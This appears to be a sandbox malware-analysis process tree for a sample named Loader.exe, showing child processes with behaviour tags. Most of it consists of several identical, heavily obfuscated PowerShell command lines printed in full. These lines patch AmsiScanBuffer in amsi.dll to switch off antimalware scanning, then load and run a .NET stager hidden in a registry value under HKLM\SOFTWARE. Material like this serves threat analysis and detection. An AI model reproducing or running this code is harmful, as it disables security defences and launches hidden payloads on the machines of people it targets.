@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dOonTScRSoM=$sZQzkaJlGUVCE.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+[Char](108)+'eH'+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+'ll')));$yOWQdOMajiPHJr=$qoPxCFiyCuasQc.Invoke($Null,@([Object]$dOonTScRSoM,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+[Char](98)+'ra'+'r'+''+[Char](121)+''+[Char](65)+'')));$YSQLjRyDukPwDaHeo=$qoPxCFiyCuasQc.Invoke($Null,@([Object]$dOonTScRSoM,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$aGGAdmL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yOWQdOMajiPHJr,$KVRWjDuSwhlErcTRzXv).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+'l'+'l');$WPguOlXmFXqHAZWjv=$qoPxCFiyCuasQc.Invoke($Null,@([Object]$aGGAdmL,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$ZevrZrGaxJ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YSQLjRyDukPwDaHeo,$UvzFkaIdQkGADgASDbHbDY).Invoke($WPguOlXmFXqHAZWjv,[uint32]8,4,[ref]$ZevrZrGaxJ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WPguOlXmFXqHAZWjv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YSQLjRyDukPwDaHeo,$UvzFkaIdQkGADgASDbHbDY).Invoke($WPguOlXmFXqHAZWjv,[uint32]8,0x20,[ref]$ZevrZrGaxJ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue('$7'+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DlivuFULauch{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$sjruktlFWYjREn,[Parameter(Position=1)][Type]$hpXmnxvTBW)$stXXrBKqmrU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+'l'+''+'e'+''+'c'+''+'t'+'e'+'d'+''+'D'+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+'y'+'M'+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e',''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+','+'A'+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'ass',[MulticastDelegate]);$stXXrBKqmrU.DefineConstructor('RTS'+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+'l'+'N'+[Char](97)+''+'m'+''+[Char](101)+','+[Char](72)+''+'i'+'d'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$sjruktlFWYjREn).SetImplementationFlags(''+'R'+'un'+[Char](116)+''+[Char](105)+''+'m'+''+'e'+',M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$stXXrBKqmrU.DefineMethod('I'+'n'+'v'+'o'+'k'+'e'+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$hpXmnxvTBW,$sjruktlFWYjREn).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+'e,M'+[Char](97)+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $stXXrBKqmrU.CreateType();}$rDlIsGmzDcVvU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m.d'+'l'+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+'3'+'2'+'.U'+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+'v'+[Char](101)+''+[Char](77)+'e'+'t'+''+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$OlMonepnBQmiup=$rDlIsGmzDcVvU.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+'ocA'+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wmkpUXOvvVPWzWTpEDH=DlivuFULauch @([String])([IntPtr]);$XbbPlPCLpvWCQIxBODsMSG=DlivuFULauch @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$lgnwawRBUTX=$rDlIsGmzDcVvU.GetMethod('G'+[Char](101)+'tM'+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$PFsmJEaiHWFMPG=$OlMonepnBQmiup.Invoke($Null,@([Object]$lgnwawRBUTX,[Object](''+'L'+'oa'+'d'+''+'L'+''+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$uouHcGVSypOOHhulP=$OlMonepnBQmiup.Invoke($Null,@([Object]$lgnwawRBUTX,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+'a'+''+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$eVuBFpt=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PFsmJEaiHWFMPG,$wmkpUXOvvVPWzWTpEDH).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+'ll');$EPDRdGnfSzYIuOkEM=$OlMonepnBQmiup.Invoke($Null,@([Object]$eVuBFpt,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+'S'+''+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$LSOZiLiPwD=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uouHcGVSypOOHhulP,$XbbPlPCLpvWCQIxBODsMSG).Invoke($EPDRdGnfSzYIuOkEM,[uint32]8,4,[ref]$LSOZiLiPwD);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EPDRdGnfSzYIuOkEM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uouHcGVSypOOHhulP,$XbbPlPCLpvWCQIxBODsMSG).Invoke($EPDRdGnfSzYIuOkEM,[uint32]8,0x20,[ref]$LSOZiLiPwD);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue('$'+[Char](55)+'7'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tTeegkbXgudq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DhNFLcdFtJVMbF,[Parameter(Position=1)][Type]$imdnrWGzLH)$KwlLJAkuotx=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Ref'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+'l'+'eg'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'em'+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+',P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+',Se'+[Char](97)+'le'+[Char](100)+''+','+'A'+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+'l'+'a'+[Char](115)+'s',[MulticastDelegate]);$KwlLJAkuotx.DefineConstructor('R'+[Char](84)+'Sp'+'e'+'c'+'i'+'al'+[Char](78)+''+[Char](97)+'me'+[Char](44)+'H'+'i'+'d'+[Char](101)+''+'B'+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$DhNFLcdFtJVMbF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$KwlLJAkuotx.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+'e',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+'B'+[Char](121)+''+'S'+'ig'+','+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$imdnrWGzLH,$DhNFLcdFtJVMbF).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+'e,'+[Char](77)+'a'+'n'+'age'+'d'+'');Write-Output $KwlLJAkuotx.CreateType();}$JGPmrhDnrjpMw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'st'+[Char](101)+''+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+'e'+'t'+''+'h'+''+[Char](111)+'d'+[Char](115)+'');$fwlkqegSqpuGMt=$JGPmrhDnrjpMw.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'t'+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zWrajpmciADardEyltI=tTeegkbXgudq @([String])([IntPtr]);$ZlfqZiJJvOBzrMIRGXJITq=tTeegkbXgudq @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QPpwvVGyjAr=$JGPmrhDnrjpMw.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+'e'+'l32'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$HLVtvETtvZpdCJ=$fwlkqegSqpuGMt.Invoke($Null,@([Object]$QPpwvVGyjAr,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$JhAFshRPqsLSmIekt=$fwlkqegSqpuGMt.Invoke($Null,@([Object]$QPpwvVGyjAr,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+'t'+'e'+''+'c'+'t')));$VLrPFJi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HLVtvETtvZpdCJ,$zWrajpmciADardEyltI).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$ELVNHNtvHVQANZzgV=$fwlkqegSqpuGMt.Invoke($Null,@([Object]$VLrPFJi,[Object](''+[Char](65)+'m'+'s'+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'nBu'+[Char](102)+''+[Char](102)+'er')));$kDjLEFrnlc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhAFshRPqsLSmIekt,$ZlfqZiJJvOBzrMIRGXJITq).Invoke($ELVNHNtvHVQANZzgV,[uint32]8,4,[ref]$kDjLEFrnlc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ELVNHNtvHVQANZzgV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JhAFshRPqsLSmIekt,$ZlfqZiJJvOBzrMIRGXJITq).Invoke($ELVNHNtvHVQANZzgV,[uint32]8,0x20,[ref]$kDjLEFrnlc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+'RE').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eSjoIGIMPRtf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cnpmHQiucQbtUY,[Parameter(Position=1)][Type]$xazPMcBvTX)$giwSoZNYwBM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+'D'+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+'M'+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+'e'+'T'+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+'le'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+''+[Char](108)+'as'+[Char](115)+',Au'+[Char](116)+'o'+[Char](67)+''+'l'+''+[Char](97)+'ss',[MulticastDelegate]);$giwSoZNYwBM.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+'l'+''+'N'+''+'a'+''+[Char](109)+''+'e'+''+','+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+','+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$cnpmHQiucQbtUY).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'im'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+'a'+''+'g'+'ed');$giwSoZNYwBM.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+','+'H'+'i'+''+[Char](100)+'e'+'B'+'y'+'S'+'ig'+','+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+'o'+''+'t'+''+[Char](44)+''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$xazPMcBvTX,$cnpmHQiucQbtUY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $giwSoZNYwBM.CreateType();}$wAxBwDObmWObA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+'e'+''+[Char](116)+'h'+'o'+'d'+'s'+'');$XENZbZdBFFUZlM=$wAxBwDObmWObA.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+'S'+'ta'+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KXsMGKAenEfelRpuMxe=eSjoIGIMPRtf @([String])([IntPtr]);$awSCtrqxKmxgdwwkSVUSXD=eSjoIGIMPRtf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JVPfbSKDRua=$wAxBwDObmWObA.GetMethod(''+[Char](71)+''+'e'+'t'+'M'+'od'+[Char](117)+''+[Char](108)+'e'+[Char](72)+'and'+[Char](108)+'e').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+[Char](108)+'l')));$mleXQdPwzvyUsJ=$XENZbZdBFFUZlM.Invoke($Null,@([Object]$JVPfbSKDRua,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+'i'+''+'b'+'ra'+[Char](114)+''+[Char](121)+''+'A'+'')));$YQcGHgDrLkJfdeoqT=$XENZbZdBFFUZlM.Invoke($Null,@([Object]$JVPfbSKDRua,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+'ot'+[Char](101)+''+[Char](99)+'t')));$vTJMopA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mleXQdPwzvyUsJ,$KXsMGKAenEfelRpuMxe).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$OSEhWXPdFpLrdMHCx=$XENZbZdBFFUZlM.Invoke($Null,@([Object]$vTJMopA,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'e'+[Char](114)+'')));$qsCYHRucVT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YQcGHgDrLkJfdeoqT,$awSCtrqxKmxgdwwkSVUSXD).Invoke($OSEhWXPdFpLrdMHCx,[uint32]8,4,[ref]$qsCYHRucVT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$OSEhWXPdFpLrdMHCx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YQcGHgDrLkJfdeoqT,$awSCtrqxKmxgdwwkSVUSXD).Invoke($OSEhWXPdFpLrdMHCx,[uint32]8,0x20,[ref]$qsCYHRucVT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"5⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"6⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"9⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\loader.exe"C:\Users\Admin\AppData\Local\Temp\loader.exe"10⤵
- Checks computer location settings
-
